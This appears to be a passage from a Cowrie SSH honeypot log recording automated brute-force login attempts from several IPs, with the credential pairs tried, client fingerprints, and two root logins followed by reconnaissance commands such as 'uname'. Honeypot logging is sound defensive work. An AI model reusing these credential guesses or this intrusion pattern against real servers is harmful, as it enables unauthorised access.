{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:20:13.253248Z","src_ip":"217.72.205.35","session":"b1866e47ec9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55106,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e53826bab1f","protocol":"ssh","message":"New connection: 212.227.235.229:55106 (1.2.3.4:22) [session: 9e53826bab1f]","sensor":"my-vps","timestamp":"2025-08-28T02:20:48.974628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:20:48.980010Z","src_ip":"212.227.235.229","session":"9e53826bab1f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:20:49.079847Z","src_ip":"212.227.235.229","session":"9e53826bab1f"}
{"eventid":"cowrie.login.failed","username":"arkserver","password":"arkserver","message":"login attempt [arkserver/arkserver] failed","sensor":"my-vps","timestamp":"2025-08-28T02:20:49.505056Z","src_ip":"212.227.235.229","session":"9e53826bab1f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:20:50.612489Z","src_ip":"212.227.235.229","session":"9e53826bab1f"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":35502,"dst_ip":"1.2.3.4","dst_port":22,"session":"4156c10f35bc","protocol":"ssh","message":"New connection: 194.233.79.134:35502 (1.2.3.4:22) [session: 4156c10f35bc]","sensor":"my-vps","timestamp":"2025-08-28T02:21:23.846404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:21:24.769149Z","src_ip":"194.233.79.134","session":"4156c10f35bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:21:24.795190Z","src_ip":"194.233.79.134","session":"4156c10f35bc"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T02:21:26.939317Z","src_ip":"194.233.79.134","session":"4156c10f35bc"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:21:28.356966Z","src_ip":"194.233.79.134","session":"4156c10f35bc"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":10489,"dst_ip":"1.2.3.4","dst_port":22,"session":"02966f7be1a3","protocol":"ssh","message":"New connection: 80.94.95.15:10489 (1.2.3.4:22) [session: 02966f7be1a3]","sensor":"my-vps","timestamp":"2025-08-28T02:22:13.228580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:22:13.230339Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:22:13.282709Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"jM8vF4aZ9uQ1sZ5","message":"login attempt [ubnt/jM8vF4aZ9uQ1sZ5] failed","sensor":"my-vps","timestamp":"2025-08-28T02:22:13.568476Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"test","message":"login attempt [ubnt/test] failed","sensor":"my-vps","timestamp":"2025-08-28T02:22:14.625154Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"Qwerty12","message":"login attempt [ubnt/Qwerty12] failed","sensor":"my-vps","timestamp":"2025-08-28T02:22:15.680159Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"uM6kS5wE0mH4kD8","message":"login attempt [ubnt/uM6kS5wE0mH4kD8] failed","sensor":"my-vps","timestamp":"2025-08-28T02:22:16.732811Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"qwerty123456","message":"login attempt [ubnt/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:22:17.787262Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:22:18.842538Z","src_ip":"80.94.95.15","session":"02966f7be1a3"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":40168,"dst_ip":"1.2.3.4","dst_port":22,"session":"04abc9c339e1","protocol":"ssh","message":"New connection: 194.233.79.134:40168 (1.2.3.4:22) [session: 04abc9c339e1]","sensor":"my-vps","timestamp":"2025-08-28T02:23:01.524292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:23:01.598906Z","src_ip":"194.233.79.134","session":"04abc9c339e1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:23:01.696054Z","src_ip":"194.233.79.134","session":"04abc9c339e1"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:23:05.076439Z","src_ip":"194.233.79.134","session":"04abc9c339e1"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:23:06.294108Z","src_ip":"194.233.79.134","session":"04abc9c339e1"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":57012,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5d7aad11887","protocol":"ssh","message":"New connection: 194.233.79.134:57012 (1.2.3.4:22) [session: f5d7aad11887]","sensor":"my-vps","timestamp":"2025-08-28T02:24:34.593302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:24:34.738780Z","src_ip":"194.233.79.134","session":"f5d7aad11887"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:24:34.831580Z","src_ip":"194.233.79.134","session":"f5d7aad11887"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:24:37.090092Z","src_ip":"194.233.79.134","session":"f5d7aad11887"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:24:38.524770Z","src_ip":"194.233.79.134","session":"f5d7aad11887"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36260,"dst_ip":"1.2.3.4","dst_port":22,"session":"9950e21ad7b7","protocol":"ssh","message":"New connection: 212.227.235.229:36260 (1.2.3.4:22) [session: 9950e21ad7b7]","sensor":"my-vps","timestamp":"2025-08-28T02:25:09.789221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:25:10.716258Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:25:10.716951Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.login.success","username":"root","password":"0878464686","message":"login attempt [root/0878464686] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:25:14.073773Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:25:15.647076Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T02:25:15.647825Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:25:16.407408Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:25:16.838811Z","src_ip":"212.227.235.229","session":"9950e21ad7b7"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45104,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc2227abd1f","protocol":"ssh","message":"New connection: 194.233.79.134:45104 (1.2.3.4:22) [session: 8dc2227abd1f]","sensor":"my-vps","timestamp":"2025-08-28T02:26:10.359803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:26:10.451358Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:26:10.774371Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":33294,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a4c10e06654","protocol":"ssh","message":"New connection: 80.94.95.15:33294 (1.2.3.4:22) [session: 0a4c10e06654]","sensor":"my-vps","timestamp":"2025-08-28T02:26:11.134055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:26:11.135212Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:26:11.227970Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:26:11.693602Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:26:12.254025Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:26:12.254799Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:26:12.496143Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:26:12.497291Z","src_ip":"194.233.79.134","session":"8dc2227abd1f"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis","message":"login attempt [francis/francis] failed","sensor":"my-vps","timestamp":"2025-08-28T02:26:12.567703Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis1","message":"login attempt [francis/francis1] failed","sensor":"my-vps","timestamp":"2025-08-28T02:26:13.654652Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis123","message":"login attempt [francis/francis123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:26:14.723735Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis1234","message":"login attempt [francis/francis1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:26:15.817387Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis12345","message":"login attempt [francis/francis12345] failed","sensor":"my-vps","timestamp":"2025-08-28T02:26:16.912310Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:26:18.322629Z","src_ip":"80.94.95.15","session":"0a4c10e06654"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53460,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddd2a829e746","protocol":"ssh","message":"New connection: 217.72.205.35:53460 (1.2.3.4:22) [session: ddd2a829e746]","sensor":"my-vps","timestamp":"2025-08-28T02:26:59.637811Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:26:59.639111Z","src_ip":"217.72.205.35","session":"ddd2a829e746"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34702,"dst_ip":"1.2.3.4","dst_port":22,"session":"b605d767a6d5","protocol":"ssh","message":"New connection: 212.227.235.229:34702 (1.2.3.4:22) [session: b605d767a6d5]","sensor":"my-vps","timestamp":"2025-08-28T02:27:27.967409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:27:27.968381Z","src_ip":"212.227.235.229","session":"b605d767a6d5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes12